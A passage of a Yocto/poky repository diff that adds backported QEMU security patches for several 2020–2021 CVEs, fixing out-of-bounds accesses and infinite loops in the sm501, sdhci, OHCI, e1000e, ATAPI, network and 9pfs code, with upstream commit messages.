sm501_2d_operation(SM501State *s) + { +- /* obtain operation parameters */ + int cmd = (s->twoD_control >> 16) & 0x1F; + int rtl = s->twoD_control & BIT(27); +- int src_x = (s->twoD_source >> 16) & 0x01FFF; +- int src_y = s->twoD_source & 0xFFFF; +- int dst_x = (s->twoD_destination >> 16) & 0x01FFF; +- int dst_y = s->twoD_destination & 0xFFFF; +- int width = (s->twoD_dimension >> 16) & 0x1FFF; +- int height = s->twoD_dimension & 0xFFFF; +- uint32_t color = s->twoD_foreground; + int format = (s->twoD_stretch >> 20) & 0x3; + int rop_mode = (s->twoD_control >> 15) & 0x1; /* 1 for rop2, else rop3 */ + /* 1 if rop2 source is the pattern, otherwise the source is the bitmap */ + int rop2_source_is_pattern = (s->twoD_control >> 14) & 0x1; + int rop = s->twoD_control & 0xFF; +- uint32_t src_base = s->twoD_source_base & 0x03FFFFFF; ++ int dst_x = (s->twoD_destination >> 16) & 0x01FFF; ++ int dst_y = s->twoD_destination & 0xFFFF; ++ int width = (s->twoD_dimension >> 16) & 0x1FFF; ++ int height = s->twoD_dimension & 0xFFFF; + uint32_t dst_base = s->twoD_destination_base & 0x03FFFFFF; +- +- /* get frame buffer info */ +- uint8_t *src = s->local_mem + src_base; + uint8_t *dst = s->local_mem + dst_base; +- int src_pitch = s->twoD_pitch & 0x1FFF; + int dst_pitch = (s->twoD_pitch >> 16) & 0x1FFF; + int crt = (s->dc_crt_control & SM501_DC_CRT_CONTROL_SEL) ? 1 : 0; + int fb_len = get_width(s, crt) * get_height(s, crt) * get_bpp(s, crt); +@@ -758,6 +749,13 @@ static void sm501_2d_operation(SM501State *s) + + switch (cmd) { + case 0x00: /* copy area */ ++ { ++ int src_x = (s->twoD_source >> 16) & 0x01FFF; ++ int src_y = s->twoD_source & 0xFFFF; ++ uint32_t src_base = s->twoD_source_base & 0x03FFFFFF; ++ uint8_t *src = s->local_mem + src_base; ++ int src_pitch = s->twoD_pitch & 0x1FFF; ++ + #define COPY_AREA(_bpp, _pixel_type, rtl) { \ + int y, x, index_d, index_s; \ + for (y = 0; y < height; y++) { \ +@@ -793,8 +791,11 @@ static void sm501_2d_operation(SM501State *s) + break; + } + break; +- ++ } + case 0x01: /* fill rectangle */ ++ { ++ uint32_t color = s->twoD_foreground; ++ + #define FILL_RECT(_bpp, _pixel_type) { \ + int y, x; \ + for (y = 0; y < height; y++) { \ +@@ -819,7 +820,7 @@ static void sm501_2d_operation(SM501State *s) + break; + } + break; +- ++ } + default: + qemu_log_mask(LOG_UNIMP, "sm501: not implemented 2D operation: %d\n", + cmd); +-- +2.25.1 + diff --git a/poky/meta/recipes-devtools/qemu/qemu/CVE-2020-12829_5.patch b/poky/meta/recipes-devtools/qemu/qemu/CVE-2020-12829_5.patch new file mode 100644 index 0000000000..ab09e8b039 --- /dev/null +++ b/poky/meta/recipes-devtools/qemu/qemu/CVE-2020-12829_5.patch @@ -0,0 +1,266 @@ +From b15a22bbcbe6a78dc3d88fe3134985e4cdd87de4 Mon Sep 17 00:00:00 2001 +From: BALATON Zoltan +Date: Thu, 21 May 2020 21:39:44 +0200 +Subject: [PATCH 5/5] sm501: Replace hand written implementation with pixman + where possible + +Besides being faster this should also prevent malicious guests to +abuse 2D engine to overwrite data or cause a crash. + +Signed-off-by: BALATON Zoltan +Message-id: 58666389b6cae256e4e972a32c05cf8aa51bffc0.1590089984.git.balaton@eik.bme.hu +Signed-off-by: Gerd Hoffmann + +Upstream-Status: Backport +CVE: CVE-2020-12829 +Signed-off-by: Armin Kuster + +--- + hw/display/sm501.c | 207 ++++++++++++++++++++++++++------------------- + 1 file changed, 119 insertions(+), 88 deletions(-) + +diff --git a/hw/display/sm501.c b/hw/display/sm501.c +index 5ed57703d8..8bf4d111f4 100644 +--- a/hw/display/sm501.c ++++ b/hw/display/sm501.c +@@ -706,13 +706,12 @@ static void sm501_2d_operation(SM501State *s) + /* 1 if rop2 source is the pattern, otherwise the source is the bitmap */ + int rop2_source_is_pattern = (s->twoD_control >> 14) & 0x1; + int rop = s->twoD_control & 0xFF; +- int dst_x = (s->twoD_destination >> 16) & 0x01FFF; +- int dst_y = s->twoD_destination & 0xFFFF; +- int width = (s->twoD_dimension >> 16) & 0x1FFF; +- int height = s->twoD_dimension & 0xFFFF; ++ unsigned int dst_x = (s->twoD_destination >> 16) & 0x01FFF; ++ unsigned int dst_y = s->twoD_destination & 0xFFFF; ++ unsigned int width = (s->twoD_dimension >> 16) & 0x1FFF; ++ unsigned int height = s->twoD_dimension & 0xFFFF; + uint32_t dst_base = s->twoD_destination_base & 0x03FFFFFF; +- uint8_t *dst = s->local_mem + dst_base; +- int dst_pitch = (s->twoD_pitch >> 16) & 0x1FFF; ++ unsigned int dst_pitch = (s->twoD_pitch >> 16) & 0x1FFF; + int crt = (s->dc_crt_control & SM501_DC_CRT_CONTROL_SEL) ? 1 : 0; + int fb_len = get_width(s, crt) * get_height(s, crt) * get_bpp(s, crt); + +@@ -721,104 +720,136 @@ static void sm501_2d_operation(SM501State *s) + return; + } + +- if (rop_mode == 0) { +- if (rop != 0xcc) { +- /* Anything other than plain copies are not supported */ +- qemu_log_mask(LOG_UNIMP, "sm501: rop3 mode with rop %x is not " +- "supported.\n", rop); +- } +- } else { +- if (rop2_source_is_pattern && rop != 0x5) { +- /* For pattern source, we support only inverse dest */ +- qemu_log_mask(LOG_UNIMP, "sm501: rop2 source being the pattern and " +- "rop %x is not supported.\n", rop); +- } else { +- if (rop != 0x5 && rop != 0xc) { +- /* Anything other than plain copies or inverse dest is not +- * supported */ +- qemu_log_mask(LOG_UNIMP, "sm501: rop mode %x is not " +- "supported.\n", rop); +- } +- } +- } +- + if (s->twoD_source_base & BIT(27) || s->twoD_destination_base & BIT(27)) { + qemu_log_mask(LOG_UNIMP, "sm501: only local memory is supported.\n"); + return; + } + ++ if (!dst_pitch) { ++ qemu_log_mask(LOG_GUEST_ERROR, "sm501: Zero dest pitch.\n"); ++ return; ++ } ++ ++ if (!width || !height) { ++ qemu_log_mask(LOG_GUEST_ERROR, "sm501: Zero size 2D op.\n"); ++ return; ++ } ++ ++ if (rtl) { ++ dst_x -= width - 1; ++ dst_y -= height - 1; ++ } ++ ++ if (dst_base >= get_local_mem_size(s) || dst_base + ++ (dst_x + width + (dst_y + height) * (dst_pitch + width)) * ++ (1 << format) >= get_local_mem_size(s)) { ++ qemu_log_mask(LOG_GUEST_ERROR, "sm501: 2D op dest is outside vram.\n"); ++ return; ++ } ++ + switch (cmd) { +- case 0x00: /* copy area */ ++ case 0: /* BitBlt */ + { +- int src_x = (s->twoD_source >> 16) & 0x01FFF; +- int src_y = s->twoD_source & 0xFFFF; ++ unsigned int src_x = (s->twoD_source >> 16) & 0x01FFF; ++ unsigned int src_y = s->twoD_source & 0xFFFF; + uint32_t src_base = s->twoD_source_base & 0x03FFFFFF; +- uint8_t *src = s->local_mem + src_base; +- int src_pitch = s->twoD_pitch & 0x1FFF; +- +-#define COPY_AREA(_bpp, _pixel_type, rtl) { \ +- int y, x, index_d, index_s; \ +- for (y = 0; y < height; y++) { \ +- for (x = 0; x < width; x++) { \ +- _pixel_type val; \ +- \ +- if (rtl) { \ +- index_s = ((src_y - y) * src_pitch + src_x - x) * _bpp; \ +- index_d = ((dst_y - y) * dst_pitch + dst_x - x) * _bpp; \ +- } else { \ +- index_s = ((src_y + y) * src_pitch + src_x + x) * _bpp; \ +- index_d = ((dst_y + y) * dst_pitch + dst_x + x) * _bpp; \ +- } \ +- if (rop_mode == 1 && rop == 5) { \ +- /* Invert dest */ \ +- val = ~*(_pixel_type *)&dst[index_d]; \ +- } else { \ +- val = *(_pixel_type *)&src[index_s]; \ +- } \ +- *(_pixel_type *)&dst[index_d] = val; \ +- } \ +- } \ +- } +- switch (format) { +- case 0: +- COPY_AREA(1, uint8_t, rtl); +- break; +- case 1: +- COPY_AREA(2, uint16_t, rtl); +- break; +- case 2: +- COPY_AREA(4, uint32_t, rtl); +- break; ++ unsigned int src_pitch = s->twoD_pitch & 0x1FFF; ++ ++ if (!src_pitch) { ++ qemu_log_mask(LOG_GUEST_ERROR, "sm501: Zero src pitch.\n"); ++ return; ++ } ++ ++ if (rtl) { ++ src_x -= width - 1; ++ src_y -= height - 1; ++ } ++ ++ if (src_base >= get_local_mem_size(s) || src_base + ++ (src_x + width + (src_y + height) * (src_pitch + width)) * ++ (1 << format) >= get_local_mem_size(s)) { ++ qemu_log_mask(LOG_GUEST_ERROR, ++ "sm501: 2D op src is outside vram.\n"); ++ return; ++ } ++ ++ if ((rop_mode && rop == 0x5) || (!rop_mode && rop == 0x55)) { ++ /* Invert dest, is there a way to do this with pixman? */ ++ unsigned int x, y, i; ++ uint8_t *d = s->local_mem + dst_base; ++ ++ for (y = 0; y < height; y++) { ++ i = (dst_x + (dst_y + y) * dst_pitch) * (1 << format); ++ for (x = 0; x < width; x++, i += (1 << format)) { ++ switch (format) { ++ case 0: ++ d[i] = ~d[i]; ++ break; ++ case 1: ++ *(uint16_t *)&d[i] = ~*(uint16_t *)&d[i]; ++ break; ++ case 2: ++ *(uint32_t *)&d[i] = ~*(uint32_t *)&d[i]; ++ break; ++ } ++ } ++ } ++ } else { ++ /* Do copy src for unimplemented ops, better than unpainted area */ ++ if ((rop_mode && (rop != 0xc || rop2_source_is_pattern)) || ++ (!rop_mode && rop != 0xcc)) { ++ qemu_log_mask(LOG_UNIMP, ++ "sm501: rop%d op %x%s not implemented\n", ++ (rop_mode ? 2 : 3), rop, ++ (rop2_source_is_pattern ? ++ " with pattern source" : "")); ++ } ++ /* Check for overlaps, this could be made more exact */ ++ uint32_t sb, se, db, de; ++ sb = src_base + src_x + src_y * (width + src_pitch); ++ se = sb + width + height * (width + src_pitch); ++ db = dst_base + dst_x + dst_y * (width + dst_pitch); ++ de = db + width + height * (width + dst_pitch); ++ if (rtl && ((db >= sb && db <= se) || (de >= sb && de <= se))) { ++ /* regions may overlap: copy via temporary */ ++ int llb = width * (1 << format); ++ int tmp_stride = DIV_ROUND_UP(llb, sizeof(uint32_t)); ++ uint32_t *tmp = g_malloc(tmp_stride * sizeof(uint32_t) * ++ height); ++ pixman_blt((uint32_t *)&s->local_mem[src_base], tmp, ++ src_pitch * (1 << format) / sizeof(uint32_t), ++ tmp_stride, 8 * (1 << format), 8 * (1 << format), ++ src_x, src_y, 0, 0, width, height); ++ pixman_blt(tmp, (uint32_t *)&s->local_mem[dst_base], ++ tmp_stride, ++ dst_pitch * (1 << format) / sizeof(uint32_t), ++ 8 * (1 << format), 8 * (1 << format), ++ 0, 0, dst_x, dst_y, width, height); ++ g_free(tmp); ++ } else { ++ pixman_blt((uint32_t *)&s->local_mem[src_base], ++ (uint32_t *)&s->local_mem[dst_base], ++ src_pitch * (1 << format) / sizeof(uint32_t), ++ dst_pitch * (1 << format) / sizeof(uint32_t), ++ 8 * (1 << format), 8 * (1 << format), ++ src_x, src_y, dst_x, dst_y, width, height); ++ } + } + break; + } +- case 0x01: /* fill rectangle */ ++ case 1: /* Rectangle Fill */ + { + uint32_t color = s->twoD_foreground; + +-#define FILL_RECT(_bpp, _pixel_type) { \ +- int y, x; \ +- for (y = 0; y < height; y++) { \ +- for (x = 0; x < width; x++) { \ +- int index = ((dst_y + y) * dst_pitch + dst_x + x) * _bpp; \ +- *(_pixel_type *)&dst[index] = (_pixel_type)color; \ +- } \ +- } \ +- } +- +- switch (format) { +- case 0: +- FILL_RECT(1, uint8_t); +- break; +- case 1: +- color = cpu_to_le16(color); +- FILL_RECT(2, uint16_t); +- break; +- case 2: ++ if (format == 2) { + color = cpu_to_le32(color); +- FILL_RECT(4, uint32_t); +- break; ++ } else if (format == 1) { ++ color = cpu_to_le16(color); + } ++ ++ pixman_fill((uint32_t *)&s->local_mem[dst_base], ++ dst_pitch * (1 << format) / sizeof(uint32_t), ++ 8 * (1 << format), dst_x, dst_y, width, height, color); + break; + } + default: +-- +2.25.1 + diff --git a/poky/meta/recipes-devtools/qemu/qemu/CVE-2020-25085.patch b/poky/meta/recipes-devtools/qemu/qemu/CVE-2020-25085.patch new file mode 100644 index 0000000000..be19256cef --- /dev/null +++ b/poky/meta/recipes-devtools/qemu/qemu/CVE-2020-25085.patch @@ -0,0 +1,46 @@ +From dfba99f17feb6d4a129da19d38df1bcd8579d1c3 Mon Sep 17 00:00:00 2001 +From: =?UTF-8?q?Philippe=20Mathieu-Daud=C3=A9?= +Date: Tue, 1 Sep 2020 15:22:06 +0200 +Subject: [PATCH] hw/sd/sdhci: Fix DMA Transfer Block Size field +MIME-Version: 1.0 +Content-Type: text/plain; charset=UTF-8 +Content-Transfer-Encoding: 8bit + +The 'Transfer Block Size' field is 12-bit wide. + +See section '2.2.2. Block Size Register (Offset 004h)' in datasheet. + +Two different bug reproducer available: +- https://bugs.launchpad.net/qemu/+bug/1892960 +- https://ruhr-uni-bochum.sciebo.de/s/NNWP2GfwzYKeKwE?path=%2Fsdhci_oob_write1 + +Cc: qemu-stable@nongnu.org +Buglink: https://bugs.launchpad.net/qemu/+bug/1892960 +Fixes: d7dfca0807a ("hw/sdhci: introduce standard SD host controller") +Reported-by: Alexander Bulekov +Signed-off-by: Philippe Mathieu-Daudé +Reviewed-by: Prasad J Pandit +Tested-by: Alexander Bulekov +Message-Id: <20200901140411.112150-3-f4bug@amsat.org> + +Upstream-Status: Backport +CVE: CVE-2020-25085 +Signed-off-by: Armin Kuster + +--- + hw/sd/sdhci.c | 2 +- + 1 file changed, 1 insertion(+), 1 deletion(-) + +Index: qemu-4.2.0/hw/sd/sdhci.c +=================================================================== +--- qemu-4.2.0.orig/hw/sd/sdhci.c ++++ qemu-4.2.0/hw/sd/sdhci.c +@@ -1129,7 +1129,7 @@ sdhci_write(void *opaque, hwaddr offset, + break; + case SDHC_BLKSIZE: + if (!TRANSFERRING_DATA(s->prnsts)) { +- MASKED_WRITE(s->blksize, mask, value); ++ MASKED_WRITE(s->blksize, mask, extract32(value, 0, 12)); + MASKED_WRITE(s->blkcnt, mask >> 16, value >> 16); + } + diff --git a/poky/meta/recipes-devtools/qemu/qemu/CVE-2020-25624_1.patch b/poky/meta/recipes-devtools/qemu/qemu/CVE-2020-25624_1.patch new file mode 100644 index 0000000000..a46b5be193 --- /dev/null +++ b/poky/meta/recipes-devtools/qemu/qemu/CVE-2020-25624_1.patch @@ -0,0 +1,87 @@ +From fbec359e9279ce78908b9f2af2c264e7448336af Mon Sep 17 00:00:00 2001 +From: Guenter Roeck +Date: Mon, 17 Feb 2020 12:48:10 -0800 +Subject: [PATCH] hw: usb: hcd-ohci: Move OHCISysBusState and TYPE_SYSBUS_OHCI + to include file + +We need to be able to use OHCISysBusState outside hcd-ohci.c, so move it +to its include file. + +Reviewed-by: Gerd Hoffmann +Signed-off-by: Guenter Roeck +Tested-by: Niek Linnenbank +Message-id: 20200217204812.9857-2-linux@roeck-us.net +Signed-off-by: Peter Maydell + +Upstream-Status: Backport +CVE: CVE-2020-25624 patch #1 +Signed-off-by: Armin Kuster + +--- + hw/usb/hcd-ohci.c | 15 --------------- + hw/usb/hcd-ohci.h | 16 ++++++++++++++++ + 2 files changed, 16 insertions(+), 15 deletions(-) + +diff --git a/hw/usb/hcd-ohci.c b/hw/usb/hcd-ohci.c +index 8a94bd004a..1e6e85e86a 100644 +--- a/hw/usb/hcd-ohci.c ++++ b/hw/usb/hcd-ohci.c +@@ -1870,21 +1870,6 @@ void ohci_sysbus_die(struct OHCIState *ohci) + ohci_bus_stop(ohci); + } + +-#define TYPE_SYSBUS_OHCI "sysbus-ohci" +-#define SYSBUS_OHCI(obj) OBJECT_CHECK(OHCISysBusState, (obj), TYPE_SYSBUS_OHCI) +- +-typedef struct { +- /*< private >*/ +- SysBusDevice parent_obj; +- /*< public >*/ +- +- OHCIState ohci; +- char *masterbus; +- uint32_t num_ports; +- uint32_t firstport; +- dma_addr_t dma_offset; +-} OHCISysBusState; +- + static void ohci_realize_pxa(DeviceState *dev, Error **errp) + { + OHCISysBusState *s = SYSBUS_OHCI(dev); +diff --git a/hw/usb/hcd-ohci.h b/hw/usb/hcd-ohci.h +index 16e3f1e13a..5c8819aedf 100644 +--- a/hw/usb/hcd-ohci.h ++++ b/hw/usb/hcd-ohci.h +@@ -22,6 +22,7 @@ + #define HCD_OHCI_H + + #include "sysemu/dma.h" ++#include "hw/usb.h" + + /* Number of Downstream Ports on the root hub: */ + #define OHCI_MAX_PORTS 15 +@@ -90,6 +91,21 @@ typedef struct OHCIState { + void (*ohci_die)(struct OHCIState *ohci); + } OHCIState; + ++#define TYPE_SYSBUS_OHCI "sysbus-ohci" ++#define SYSBUS_OHCI(obj) OBJECT_CHECK(OHCISysBusState, (obj), TYPE_SYSBUS_OHCI) ++ ++typedef struct { ++ /*< private >*/ ++ SysBusDevice parent_obj; ++ /*< public >*/ ++ ++ OHCIState ohci; ++ char *masterbus; ++ uint32_t num_ports; ++ uint32_t firstport; ++ dma_addr_t dma_offset; ++} OHCISysBusState; ++ + extern const VMStateDescription vmstate_ohci_state; + + void usb_ohci_init(OHCIState *ohci, DeviceState *dev, uint32_t num_ports, +-- +2.25.1 + diff --git a/poky/meta/recipes-devtools/qemu/qemu/CVE-2020-25624_2.patch b/poky/meta/recipes-devtools/qemu/qemu/CVE-2020-25624_2.patch new file mode 100644 index 0000000000..8c1275b2f4 --- /dev/null +++ b/poky/meta/recipes-devtools/qemu/qemu/CVE-2020-25624_2.patch @@ -0,0 +1,101 @@ +From 1328fe0c32d5474604105b8105310e944976b058 Mon Sep 17 00:00:00 2001 +From: Prasad J Pandit +Date: Tue, 15 Sep 2020 23:52:58 +0530 +Subject: [PATCH] hw: usb: hcd-ohci: check len and frame_number variables + +While servicing the OHCI transfer descriptors(TD), OHCI host +controller derives variables 'start_addr', 'end_addr', 'len' +etc. from values supplied by the host controller driver. +Host controller driver may supply values such that using +above variables leads to out-of-bounds access issues. +Add checks to avoid them. + +AddressSanitizer: stack-buffer-overflow on address 0x7ffd53af76a0 + READ of size 2 at 0x7ffd53af76a0 thread T0 + #0 ohci_service_iso_td ../hw/usb/hcd-ohci.c:734 + #1 ohci_service_ed_list ../hw/usb/hcd-ohci.c:1180 + #2 ohci_process_lists ../hw/usb/hcd-ohci.c:1214 + #3 ohci_frame_boundary ../hw/usb/hcd-ohci.c:1257 + #4 timerlist_run_timers ../util/qemu-timer.c:572 + #5 qemu_clock_run_timers ../util/qemu-timer.c:586 + #6 qemu_clock_run_all_timers ../util/qemu-timer.c:672 + #7 main_loop_wait ../util/main-loop.c:527 + #8 qemu_main_loop ../softmmu/vl.c:1676 + #9 main ../softmmu/main.c:50 + +Reported-by: Gaoning Pan +Reported-by: Yongkang Jia +Reported-by: Yi Ren +Signed-off-by: Prasad J Pandit +Message-id: 20200915182259.68522-2-ppandit@redhat.com +Signed-off-by: Gerd Hoffmann + +Upstream-Status: Backport +CVE: CVE-2020-25624 patch #2 +Signed-off-by: Armin Kuster + +--- + hw/usb/hcd-ohci.c | 24 ++++++++++++++++++++++-- + 1 file changed, 22 insertions(+), 2 deletions(-) + +diff --git a/hw/usb/hcd-ohci.c b/hw/usb/hcd-ohci.c +index 1e6e85e86a..9dc59101f9 100644 +--- a/hw/usb/hcd-ohci.c ++++ b/hw/usb/hcd-ohci.c +@@ -731,7 +731,11 @@ static int ohci_service_iso_td(OHCIState *ohci, struct ohci_ed *ed, + } + + start_offset = iso_td.offset[relative_frame_number]; +- next_offset = iso_td.offset[relative_frame_number + 1]; ++ if (relative_frame_number < frame_count) { ++ next_offset = iso_td.offset[relative_frame_number + 1]; ++ } else { ++ next_offset = iso_td.be; ++ } + + if (!(OHCI_BM(start_offset, TD_PSW_CC) & 0xe) || + ((relative_frame_number < frame_count) && +@@ -764,7 +768,12 @@ static int ohci_service_iso_td(OHCIState *ohci, struct ohci_ed *ed, + } + } else { + /* Last packet in the ISO TD */ +- end_addr = iso_td.be; ++ end_addr = next_offset; ++ } ++ ++ if (start_addr > end_addr) { ++ trace_usb_ohci_iso_td_bad_cc_overrun(start_addr, end_addr); ++ return 1; + } + + if ((start_addr & OHCI_PAGE_MASK) != (end_addr & OHCI_PAGE_MASK)) { +@@ -773,6 +782,9 @@ static int ohci_service_iso_td(OHCIState *ohci, struct ohci_ed *ed, + } else { + len = end_addr - start_addr + 1; + } ++ if (len > sizeof(ohci->usb_buf)) { ++ len = sizeof(ohci->usb_buf); ++ } + + if (len && dir != OHCI_TD_DIR_IN) { + if (ohci_copy_iso_td(ohci, start_addr, end_addr, ohci->usb_buf, len, +@@ -975,8 +987,16 @@ static int ohci_service_td(OHCIState *ohci, struct ohci_ed *ed) + if ((td.cbp & 0xfffff000) != (td.be & 0xfffff000)) { + len = (td.be & 0xfff) + 0x1001 - (td.cbp & 0xfff); + } else { ++ if (td.cbp > td.be) { ++ trace_usb_ohci_iso_td_bad_cc_overrun(td.cbp, td.be); ++ ohci_die(ohci); ++ return 1; ++ } + len = (td.be - td.cbp) + 1; + } ++ if (len > sizeof(ohci->usb_buf)) { ++ len = sizeof(ohci->usb_buf); ++ } + + pktlen = len; + if (len && dir != OHCI_TD_DIR_IN) { +-- +2.25.1 + diff --git a/poky/meta/recipes-devtools/qemu/qemu/CVE-2020-25625.patch b/poky/meta/recipes-devtools/qemu/qemu/CVE-2020-25625.patch new file mode 100644 index 0000000000..374d7c4562 --- /dev/null +++ b/poky/meta/recipes-devtools/qemu/qemu/CVE-2020-25625.patch @@ -0,0 +1,42 @@ +From 1be90ebecc95b09a2ee5af3f60c412b45a766c4f Mon Sep 17 00:00:00 2001 +From: Prasad J Pandit +Date: Tue, 15 Sep 2020 23:52:59 +0530 +Subject: [PATCH] hw: usb: hcd-ohci: check for processed TD before retire + +While servicing OHCI transfer descriptors(TD), ohci_service_iso_td +retires a TD if it has passed its time frame. It does not check if +the TD was already processed once and holds an error code in TD_CC. +It may happen if the TD list has a loop. Add check to avoid an +infinite loop condition. + +Signed-off-by: Prasad J Pandit +Reviewed-by: Li Qiang +Message-id: 20200915182259.68522-3-ppandit@redhat.com +Signed-off-by: Gerd Hoffmann + +Upstream-Status: Backport +CVE: CVE-2020-25625 +Signed-off-by: Armin Kuster + +--- + hw/usb/hcd-ohci.c | 4 ++++ + 1 file changed, 4 insertions(+) + +diff --git a/hw/usb/hcd-ohci.c b/hw/usb/hcd-ohci.c +index 9dc59101f9..8b912e95d3 100644 +--- a/hw/usb/hcd-ohci.c ++++ b/hw/usb/hcd-ohci.c +@@ -691,6 +691,10 @@ static int ohci_service_iso_td(OHCIState *ohci, struct ohci_ed *ed, + the next ISO TD of the same ED */ + trace_usb_ohci_iso_td_relative_frame_number_big(relative_frame_number, + frame_count); ++ if (OHCI_CC_DATAOVERRUN == OHCI_BM(iso_td.flags, TD_CC)) { ++ /* avoid infinite loop */ ++ return 1; ++ } + OHCI_SET_BM(iso_td.flags, TD_CC, OHCI_CC_DATAOVERRUN); + ed->head &= ~OHCI_DPTR_MASK; + ed->head |= (iso_td.next & OHCI_DPTR_MASK); +-- +2.25.1 + diff --git a/poky/meta/recipes-devtools/qemu/qemu/CVE-2020-27617.patch b/poky/meta/recipes-devtools/qemu/qemu/CVE-2020-27617.patch new file mode 100644 index 0000000000..7bfc2beecb --- /dev/null +++ b/poky/meta/recipes-devtools/qemu/qemu/CVE-2020-27617.patch @@ -0,0 +1,49 @@ +From 7564bf7701f00214cdc8a678a9f7df765244def1 Mon Sep 17 00:00:00 2001 +From: Prasad J Pandit +Date: Wed, 21 Oct 2020 11:35:50 +0530 +Subject: [PATCH] net: remove an assert call in eth_get_gso_type + +eth_get_gso_type() routine returns segmentation offload type based on +L3 protocol type. It calls g_assert_not_reached if L3 protocol is +unknown, making the following return statement unreachable. Remove the +g_assert call, it maybe triggered by a guest user. + +Reported-by: Gaoning Pan +Signed-off-by: Prasad J Pandit +Signed-off-by: Jason Wang + +Upsteram-Status: Backport +CVE: CVE-2020-27617 +Signed-off-by: Armin Kuster + +--- + net/eth.c | 6 +++--- + 1 file changed, 3 insertions(+), 3 deletions(-) + +diff --git a/net/eth.c b/net/eth.c +index 0c1d413ee2..1e0821c5f8 100644 +--- a/net/eth.c ++++ b/net/eth.c +@@ -16,6 +16,7 @@ + */ + + #include "qemu/osdep.h" ++#include "qemu/log.h" + #include "net/eth.h" + #include "net/checksum.h" + #include "net/tap.h" +@@ -71,9 +72,8 @@ eth_get_gso_type(uint16_t l3_proto, uint8_t *l3_hdr, uint8_t l4proto) + return VIRTIO_NET_HDR_GSO_TCPV6 | ecn_state; + } + } +- +- /* Unsupported offload */ +- g_assert_not_reached(); ++ qemu_log_mask(LOG_UNIMP, "%s: probably not GSO frame, " ++ "unknown L3 protocol: 0x%04"PRIx16"\n", __func__, l3_proto); + + return VIRTIO_NET_HDR_GSO_NONE | ecn_state; + } +-- +2.25.1 + diff --git a/poky/meta/recipes-devtools/qemu/qemu/CVE-2020-28916.patch b/poky/meta/recipes-devtools/qemu/qemu/CVE-2020-28916.patch new file mode 100644 index 0000000000..756b1c1495 --- /dev/null +++ b/poky/meta/recipes-devtools/qemu/qemu/CVE-2020-28916.patch @@ -0,0 +1,48 @@ +From c2cb511634012344e3d0fe49a037a33b12d8a98a Mon Sep 17 00:00:00 2001 +From: Prasad J Pandit +Date: Wed, 11 Nov 2020 18:36:36 +0530 +Subject: [PATCH] hw/net/e1000e: advance desc_offset in case of null descriptor + +While receiving packets via e1000e_write_packet_to_guest() routine, +'desc_offset' is advanced only when RX descriptor is processed. And +RX descriptor is not processed if it has NULL buffer address. +This may lead to an infinite loop condition. Increament 'desc_offset' +to process next descriptor in the ring to avoid infinite loop. + +Reported-by: Cheol-woo Myung <330cjfdn@gmail.com> +Signed-off-by: Prasad J Pandit +Signed-off-by: Jason Wang + +Upstream-Status: Backport +CVE: CVE-2020-28916 +Signed-off-by: Armin Kuster + +--- + hw/net/e1000e_core.c | 8 ++++---- + 1 file changed, 4 insertions(+), 4 deletions(-) + +diff --git a/hw/net/e1000e_core.c b/hw/net/e1000e_core.c +index d8b9e4b2f4..095c01ebc6 100644 +--- a/hw/net/e1000e_core.c ++++ b/hw/net/e1000e_core.c +@@ -1596,13 +1596,13 @@ e1000e_write_packet_to_guest(E1000ECore *core, struct NetRxPkt *pkt, + (const char *) &fcs_pad, e1000x_fcs_len(core->mac)); + } + } +- desc_offset += desc_size; +- if (desc_offset >= total_size) { +- is_last = true; +- } + } else { /* as per intel docs; skip descriptors with null buf addr */ + trace_e1000e_rx_null_descriptor(); + } ++ desc_offset += desc_size; ++ if (desc_offset >= total_size) { ++ is_last = true; ++ } + + e1000e_write_rx_descr(core, desc, is_last ? core->rx_pkt : NULL, + rss_info, do_ps ? ps_hdr_len : 0, &bastate.written); +-- +2.25.1 + diff --git a/poky/meta/recipes-devtools/qemu/qemu/CVE-2020-29443.patch b/poky/meta/recipes-devtools/qemu/qemu/CVE-2020-29443.patch new file mode 100644 index 0000000000..1528d5c2fd --- /dev/null +++ b/poky/meta/recipes-devtools/qemu/qemu/CVE-2020-29443.patch @@ -0,0 +1,45 @@ +From 813212288970c39b1800f63e83ac6e96588095c6 Mon Sep 17 00:00:00 2001 +From: Paolo Bonzini +Date: Tue, 1 Dec 2020 13:09:26 +0100 +Subject: [PATCH] ide: atapi: assert that the buffer pointer is in range + +A case was reported where s->io_buffer_index can be out of range. +The report skimped on the details but it seems to be triggered +by s->lba == -1 on the READ/READ CD paths (e.g. by sending an +ATAPI command with LBA = 0xFFFFFFFF). For now paper over it +with assertions. The first one ensures that there is no overflow +when incrementing s->io_buffer_index, the second checks for the +buffer overrun. + +Note that the buffer overrun is only a read, so I am not sure +if the assertion failure is actually less harmful than the overrun. + +Signed-off-by: Paolo Bonzini +Message-id: 20201201120926.56559-1-pbonzini@redhat.com +Reviewed-by: Kevin Wolf +Signed-off-by: Peter Maydell + +Upstream-Status: Backport +CVE: CVE-2020-29443 +Signed-off-by: Armin Kuster + +--- + hw/ide/atapi.c | 2 ++ + 1 file changed, 2 insertions(+) + +diff --git a/hw/ide/atapi.c b/hw/ide/atapi.c +index 14a2b0bb2f..e79157863f 100644 +--- a/hw/ide/atapi.c ++++ b/hw/ide/atapi.c +@@ -276,6 +276,8 @@ void ide_atapi_cmd_reply_end(IDEState *s) + s->packet_transfer_size -= size; + s->elementary_transfer_size -= size; + s->io_buffer_index += size; ++ assert(size <= s->io_buffer_total_len); ++ assert(s->io_buffer_index <= s->io_buffer_total_len); + + /* Some adapters process PIO data right away. In that case, we need + * to avoid mutual recursion between ide_transfer_start +-- +2.25.1 + diff --git a/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-20181.patch b/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-20181.patch new file mode 100644 index 0000000000..1b8c77f838 --- /dev/null +++ b/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-20181.patch @@ -0,0 +1,81 @@ +From c2d2d14e8deece958bbc4fc649d22c3564bc4e7e Mon Sep 17 00:00:00 2001 +From: Greg Kurz +Date: Thu, 14 Jan 2021 17:04:12 +0100 +Subject: [PATCH] 9pfs: Fully restart unreclaim loop (CVE-2021-20181) + +Depending on the client activity, the server can be asked to open a huge +number of file descriptors and eventually hit RLIMIT_NOFILE. This is +currently mitigated using a reclaim logic : the server closes the file +descriptors of idle fids, based on the assumption that it will be able +to re-open them later. This assumption doesn't hold of course if the +client requests the file to be unlinked. In this case, we loop on the +entire fid list and mark all related fids as unreclaimable (the reclaim +logic will just ignore them) and, of course, we open or re-open their +file descriptors if needed since we're about to unlink the file. + +This is the purpose of v9fs_mark_fids_unreclaim(). Since the actual +opening of a file can cause the coroutine to yield, another client +request could possibly add a new fid that we may want to mark as +non-reclaimable as well. The loop is thus restarted if the re-open +request was actually 